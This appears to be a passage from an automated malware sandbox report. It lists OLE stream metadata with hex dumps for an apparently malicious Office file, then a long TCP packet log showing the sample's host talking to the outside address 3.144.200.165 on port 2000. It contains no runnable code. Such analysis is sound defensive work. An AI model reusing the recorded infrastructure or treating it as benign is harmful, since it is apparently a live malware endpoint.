Stream Path: \x18496\x17610\x16179\x16680\x16821\x18475, File Type: data, Stream Size: 4

General
Stream Path:	\x18496\x17610\x16179\x16680\x16821\x18475
File Type:	data
Stream Size:	4
Entropy:	2.0
Base64 Encoded:	False
Data ASCII:	. . 1 .
Data Raw:	9e 02 31 00

Stream Path: \x18496\x17630\x17770\x16868\x18472, File Type: data, Stream Size: 32

General
Stream Path:	\x18496\x17630\x17770\x16868\x18472
File Type:	data
Stream Size:	32
Entropy:	2.67592566118
Base64 Encoded:	False
Data ASCII:	. . . . w . m . . . w . . . . . . . . . . . . . . . . . . . n .
Data Raw:	86 01 86 01 77 01 6d 07 00 00 77 01 00 00 00 00 02 00 00 80 01 01 00 80 00 00 00 00 86 06 6e 07

Stream Path: \x18496\x17740\x16680\x16951\x17551\x16879\x17768, File Type: data, Stream Size: 8

General
Stream Path:	\x18496\x17740\x16680\x16951\x17551\x16879\x17768
File Type:	data
Stream Size:	8
Entropy:	1.5
Base64 Encoded:	False
Data ASCII:	$ . & . $ . & .
Data Raw:	24 00 26 00 24 00 26 00

Stream Path: \x18496\x17741\x17557\x16678\x17591\x18485, File Type: data, Stream Size: 8

General
Stream Path:	\x18496\x17741\x17557\x16678\x17591\x18485
File Type:	data
Stream Size:	8
Entropy:	2.0
Base64 Encoded:	False
Data ASCII:	1 . . . . . . .
Data Raw:	31 00 00 00 e7 03 00 80

Stream Path: \x18496\x17742\x17589\x18485, File Type: data, Stream Size: 2564

General
Stream Path:	\x18496\x17742\x17589\x18485
File Type:	data
Stream Size:	2564
Entropy:	6.53844096881
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ! . . . M . . . . . . . . . . . . . . . . . . . . . . . . ! . " . # . $ . % . & . ' . ( . ) . * . + . , . - . . . / . 0 . 1 . 2 . 3 . 4 . 5 . 6 . 7 . 8 . y . z . { . \| . } . ~ . . . . . . . . . . . . . . . . . A . B . C . D . E . F . G . H . I . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . m . n . o . p .
Data Raw:	00 80 01 80 02 80 03 80 04 80 05 80 06 80 07 80 08 80 09 80 0a 80 0b 80 0c 80 0d 80 0e 80 0f 80 10 80 11 80 12 80 13 80 14 80 15 80 16 80 17 80 20 80 21 80 e9 83 4d 84 15 85 16 85 17 85 18 85 19 85 1a 85 1b 85 1c 85 1d 85 1e 85 1f 85 20 85 21 85 22 85 23 85 24 85 25 85 26 85 27 85 28 85 29 85 2a 85 2b 85 2c 85 2d 85 2e 85 2f 85 30 85 31 85 32 85 33 85 34 85 35 85 36 85 37 85 38 85

Stream Path: \x18496\x17753\x17650\x17768\x18231, File Type: data, Stream Size: 364

General
Stream Path:	\x18496\x17753\x17650\x17768\x18231
File Type:	data
Stream Size:	364
Entropy:	4.71069794291
Base64 Encoded:	False
Data ASCII:	% . . . $ . X . Z . \\ . ^ . ` . a . c . e . h . i . k . m . n . p . r . t . v . x . { . } . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . z . . . g . Y . [ . ] . _ . [ . b . d . f . _ . j . l . f . o . q . s . u . w . y . \| . ~ . . . . . f . . . y . . . . . . . . . . . . . . . . . . .
Data Raw:	25 00 c3 00 24 01 58 01 5a 01 5c 01 5e 01 60 01 61 01 63 01 65 01 68 01 69 01 6b 01 6d 01 6e 01 70 01 72 01 74 01 76 01 78 01 7b 01 7d 01 7f 01 81 01 83 01 84 01 87 01 88 01 8a 01 8c 01 8e 01 90 01 91 01 93 01 95 01 97 01 98 01 9a 01 9b 01 9c 01 9d 01 9f 01 a1 01 a3 01 a5 01 a7 01 a9 01 ab 01 ad 01 af 01 b1 01 b3 01 b5 01 b7 01 b9 01 bb 01 bd 01 bf 01 c1 01 c3 01 c4 01 c6 01 c8 01

Stream Path: \x18496\x17932\x17910\x17458\x16778\x17207\x17522, File Type: data, Stream Size: 264

General
Stream Path:	\x18496\x17932\x17910\x17458\x16778\x17207\x17522
File Type:	data
Stream Size:	264
Entropy:	3.81175823526
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3 . . . A . . . A . 3 . . . A . 3 . A . . . 3 . 3 . 3 . 3 . . . 3 . 3 . 3 . 3 . 3 . . . . . . . . . . . . . . . . . . . . . . . . . . . & . . . . . . . . . . . . . . . . . . . f . . . . . . . . . . . . . . . . . . . . . . . . . . . . . q . . . f . f . f . f . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	98 02 9d 03 a9 03 b8 03 ba 03 bd 03 c0 03 c2 03 c4 03 c7 03 c9 03 cb 03 ce 03 d0 03 d3 03 d4 03 d5 03 d8 03 d9 03 da 03 db 03 dc 03 33 80 01 80 41 80 01 80 41 81 33 80 13 80 41 80 33 80 41 80 01 80 33 80 33 81 33 81 33 80 c1 80 33 80 33 80 33 80 33 80 33 80 01 80 d7 03 9f 02 9f 02 9f 02 9f 02 be 03 00 00 9f 02 c5 03 9f 02 9f 02 cc 03 26 00 d1 03 f9 02 a0 02 80 03 86 03 80 03 81 03

Stream Path: \x18496\x17998\x17512\x15799\x17636\x17203\x17073, File Type: Atari ATR image, Stream Size: 128

General
Stream Path:	\x18496\x17998\x17512\x15799\x17636\x17203\x17073
File Type:	Atari ATR image
Stream Size:	128
Entropy:	4.21020611944
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . T . . . T . ^ . . . T . . . . . . . . . . . . . . . . . ! . # . T . e . T . ^ . g . T . e . g . h . h . h . m . l . m . k . j . J . f . J . J . g . J . f . g . i . i . i . n . J . n . J . J .
Data Raw:	96 02 96 02 9c 02 9c 02 a8 02 f6 02 f6 02 0c 03 12 03 12 03 12 03 12 03 12 03 12 03 12 03 12 03 54 00 f7 02 54 00 5e 03 fc 02 54 00 f7 02 fc 02 cd 02 16 03 18 03 1a 03 1c 03 1c 03 21 03 23 03 54 00 65 06 54 00 5e 03 67 06 54 00 65 06 67 06 68 06 68 06 68 06 6d 06 6c 06 6d 06 6b 06 6a 06 4a 00 66 06 4a 00 4a 00 67 06 4a 00 66 06 67 06 69 06 69 06 69 06 6e 06 4a 00 6e 06 4a 00 4a 00

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 3, 2021 14:43:44.497884035 CET	49764	80	192.168.2.4	192.168.0.108
Nov 3, 2021 14:43:47.505120039 CET	49764	80	192.168.2.4	192.168.0.108
Nov 3, 2021 14:43:53.505574942 CET	49764	80	192.168.2.4	192.168.0.108
Nov 3, 2021 14:44:05.518515110 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:05.667665005 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:05.667831898 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:06.788276911 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:06.936507940 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:06.991077900 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:07.928997040 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:08.120524883 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.072635889 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.072674990 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.072765112 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:38.072932959 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.072958946 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.072983980 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.073035002 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:38.118731022 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:38.220968008 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.221004009 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.221029997 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.221054077 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.221070051 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:38.221077919 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.221100092 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:38.221102953 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.221160889 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:38.266948938 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.266979933 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.267086983 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:38.369179010 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.369214058 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.369235992 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.369260073 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.369282007 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.369304895 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.369323969 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.369337082 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:38.369342089 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.369360924 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.369378090 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:38.369384050 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.369406939 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.369434118 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.369590998 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:38.369605064 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:38.369609118 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:38.417602062 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.417632103 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.417654991 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.417678118 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.417706013 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:38.417737007 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:38.517546892 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.517590046 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.517606974 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.517628908 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.517653942 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.517673016 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.517694950 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.517715931 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.517736912 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.517760038 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.517776012 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:38.517781973 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.517807007 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.517827034 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.517838955 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:38.517848969 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.517870903 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.517874956 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:38.517890930 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.517896891 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:38.517915964 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.517940998 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.517963886 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.517977953 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:38.517985106 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.518004894 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.518022060 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:38.518024921 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.518049002 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.518049955 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:38.518069029 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.518079042 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:38.518116951 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:38.565804005 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.565854073 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.565891981 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.565922976 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.565943003 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:38.565968990 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:38.568495035 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.568537951 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.568567991 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.568600893 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.568649054 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:38.568675995 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:38.666264057 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.666316032 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.666340113 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.666364908 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.666388035 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.666412115 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.666433096 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:38.666436911 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.666461945 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.666486025 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.666510105 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.666521072 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:38.666533947 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.666558027 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.666582108 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.666594028 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:38.666606903 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.666630983 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.666641951 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:38.666655064 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.666677952 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.666682959 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:38.666702986 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.666722059 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:38.666726112 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.666749954 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.666775942 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.666786909 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:38.666800022 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.666824102 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.666847944 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.666872978 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.666893959 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:38.666898012 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.666922092 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.666944981 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.666970015 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.666979074 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:38.666994095 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.667017937 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.667026043 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:38.667042017 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.667067051 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.667073011 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:38.667092085 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.667103052 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:38.667110920 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.667130947 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.667154074 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.667179108 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.667182922 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:38.667201996 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.667223930 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.667232990 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:38.667340994 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:38.714019060 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.714051962 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.714076996 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.714099884 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.714164019 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:38.714215040 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:38.716636896 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.716666937 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.716690063 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.716715097 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.716728926 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:38.716759920 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:38.815938950 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.815973997 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.815999031 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.816020012 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.816044092 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.816063881 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.816090107 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.816114902 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:38.816121101 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.816153049 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.816184998 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.816210985 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.816245079 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.816274881 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.816309929 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.816334963 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.816365004 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.816391945 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.816394091 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:38.816421986 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.816436052 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:38.816447973 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.816466093 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:38.816479921 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.816512108 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.816525936 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:38.816543102 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.816566944 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.816590071 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:38.816600084 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.816637993 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.816664934 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.816689014 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:38.816689014 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.816719055 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.816734076 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:38.816751003 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.816781998 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.816798925 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:38.816806078 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.816829920 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:38.816838026 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.816874981 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.816885948 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:38.816903114 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.816931009 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.816951990 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:38.816952944 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.816981077 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.816993952 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:38.817006111 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.817037106 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.817049026 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:38.817068100 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.817192078 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:38.862211943 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.862248898 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.862420082 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:38.864449024 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.864480019 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.864600897 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.864619970 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:38.864625931 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.864655018 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.864684105 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:38.864686012 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.864754915 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:38.965529919 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.965576887 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.965605974 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.965636969 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.965663910 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.965667009 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:38.965691090 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.965693951 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:38.965719938 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.965745926 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.965747118 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:38.965775013 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.965801954 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.965827942 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.965831995 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:38.965854883 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.965882063 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:38.965883017 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.965909958 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:38.965910912 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.965939045 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.965965033 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.965965033 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:38.965991974 CET	2000	49766	3.144.200.165	192.168.2.4
